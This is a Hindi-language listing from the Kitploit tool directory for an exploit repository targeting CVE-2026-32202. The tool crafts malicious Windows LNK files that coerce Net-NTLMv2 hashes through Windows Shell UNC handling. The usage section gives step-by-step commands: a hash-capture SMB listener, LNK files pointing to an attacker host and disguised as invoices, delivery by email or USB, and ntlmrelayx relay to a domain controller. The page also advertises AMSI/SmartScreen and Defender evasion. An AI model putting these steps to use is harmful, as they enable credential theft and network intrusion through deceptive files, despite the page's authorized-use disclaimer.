Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-32202 — लिंक फ़ाइलें उत्पन्न करता है जो Windows Shell UNC हैंडलिंग के माध्यम से Net-NTLMv2 हैश को बाध्य करने के लिए दुर्भावनापूर्ण LNK फ़ाइलें बनाती हैं, जिसमें अधिकृत रेड टीम संचालन के लिए कस्टम SMB लिसनर और रिले एकीकरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
पेलोड जनरेशनशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

लिंक फ़ाइलें उत्पन्न करता है जो Windows Shell UNC हैंडलिंग के माध्यम से Net-NTLMv2 हैश को बाध्य करने के लिए दुर्भावनापूर्ण LNK फ़ाइलें बनाती हैं, जिसमें अधिकृत रेड टीम संचालन के लिए कस्टम SMB लिसनर और रिले एकीकरण शामिल है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
3 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

अस्वीकरण

यह टूल केवल अधिकृत रेड टीमिंग और पेनेट्रेशन टेस्टिंग के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है।
अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

विवरण
अपूर्ण Windows Shell सुरक्षा बाईपास (CVE-2026-32202) के माध्यम से NTLMv2 हैश कोएर्शन। विशेष रूप से तैयार किए गए LNK फ़ाइलें बनाता है जो Explorer में खोलने या प्रीव्यू करने पर SMB/UNC प्रमाणीकरण को बाध्य करती हैं। कम इंटरैक्शन, पैच किए गए सिस्टम पर काम करता है जहां अप्रैल 2026 का फिक्स अपर्याप्त था। एंगेजमेंट में सक्रिय रूप से उपयोग किया जाता है।

मुख्य विशेषताएं

  • दुर्भावनापूर्ण LNK के माध्यम से ज़ीरो-क्लिक / न्यूनतम-इंटरैक्शन Net-NTLMv2 लीक (Explorer प्रीव्यू + आइकन रिज़ॉल्यूशन पथ)।
  • हैश कैप्चर के लिए कस्टम SMB लिसनर (Responder की आवश्यकता नहीं, स्वच्छ लॉग)।
  • कम ETW/Defender फुटप्रिंट के साथ स्थिर वैरिएंट।
  • आंशिक AMSI/SmartScreen बाईपास मोड।
  • ntlmrelayx रिले चेन (SMB, LDAP, HTTP, आदि) के लिए तैयार।

एक्सप्लॉइट क्या करता है
टूल एक तैयार किया गया .LNK बनाता है जो Target + IconEnvironmentDataBlock / ExtraData संरचनाओं में UNC पथों के Shell के हैंडलिंग का दुरुपयोग करता है। जब पीड़ित फ़ोल्डर ब्राउज़ करता है या फ़ाइल पर होवर/प्रीव्यू करता है, तो Windows Shell हमलावर-नियंत्रित UNC के लिए SMB कनेक्शन शुरू करता है, जिससे मशीन/उपयोगकर्ता का Net-NTLMv2 हैश लीक होता है। लक्ष्य पर कोई कोड निष्पादन नहीं - रिले या क्रैकिंग के लिए क्रेडेंशियल कोएर्शन।

यह क्यों उपयोगी है

  • आंतरिक पेंटेस्ट / रेड टीम ऑप्स में तेज़ प्रारंभिक पहुंच (विशेष रूप से एयर-गैप्ड या कठोर वातावरण जहां फ़िशिंग प्रतिबंधित है)।
  • उच्च-मूल्य वाले लक्ष्यों (DCs, फ़ाइल सर्वर, Exchange, ADCS, आदि) के लिए NTLM रिले के लिए एकदम सही।
  • वहां काम करता है जहां क्लासिक Responder ब्लॉक या शोरगुल वाला है।
  • Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 पर उच्च सफलता दर (नीचे परीक्षण किए गए बिल्ड)।

परीक्षण किया गया

  • Windows 11 24H2 (बिल्ड 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (कोर + डेस्कटॉप अनुभव)
  • अप्रैल 2026 क्यूम्युलेटिव अपडेट के बाद आंशिक रूप से प्रभावी (अपूर्ण पैच जंगली में पुष्टि)।
  • निर्भरताएँ इंस्टॉल करें: pip install -r requirements.txt

    उपयोग

    root@kitploit:~
    # 1. कैप्चर सर्वर शुरू करें (हमलावर होस्ट)
    python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
    
    # 2. दुर्भावनापूर्ण LNK जनरेट करें
    python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
    
    # वैकल्पिक: स्थिर या बाईपास मोड
    python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
    
    # 3. LNK डिलीवर करें (USB, शेयर, ईमेल अटैचमेंट, OneDrive, आदि)
    
    # 4. टर्मिनल + फ़ाइल में हैश की प्रतीक्षा करें। उदाहरण रिले:
    ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
    # या RBCD के लिए LDAP रिले, ADCS सर्ट के लिए HTTP, आदि।
    

    एक्सप्लॉइट

    href

    सीमाएँ

    • पीड़ित को युक्त फ़ोल्डर के साथ इंटरैक्ट करना आवश्यक है (Explorer प्रीव्यू/होवर आमतौर पर पर्याप्त है)।
    • आधुनिक नेटवर्क सेगमेंटेशन + SMB साइनिंग + NTLM प्रतिबंध रिले सफलता को कम करते हैं।
    • पूर्ण RCE नहीं - केवल क्रेडेंशियल सामग्री।
    • पैच स्थिति मायने रखती है; पूरी तरह से अपडेट किए गए अप्रैल 2026+ सिस्टम को बाईपास वैरिएंट की आवश्यकता हो सकती है।

    मूल कारण (संक्षिप्त)
    LNK आइकन/टारगेट रिज़ॉल्यूशन के लिए Windows Shell की UNC पथ सैनिटाइज़ेशन और ExtraData ब्लॉक प्रोसेसिंग में अपूर्ण फिक्स। अनधिकृत नेटवर्क स्पूफिंग को ब्लॉक करने के लिए इच्छित सुरक्षा तंत्र अभी भी Shell नेमस्पेस एन्यूमरेशन के दौरान NTLM प्रमाणीकरण ट्रिगर करता है।

    टूल डाउनलोड करें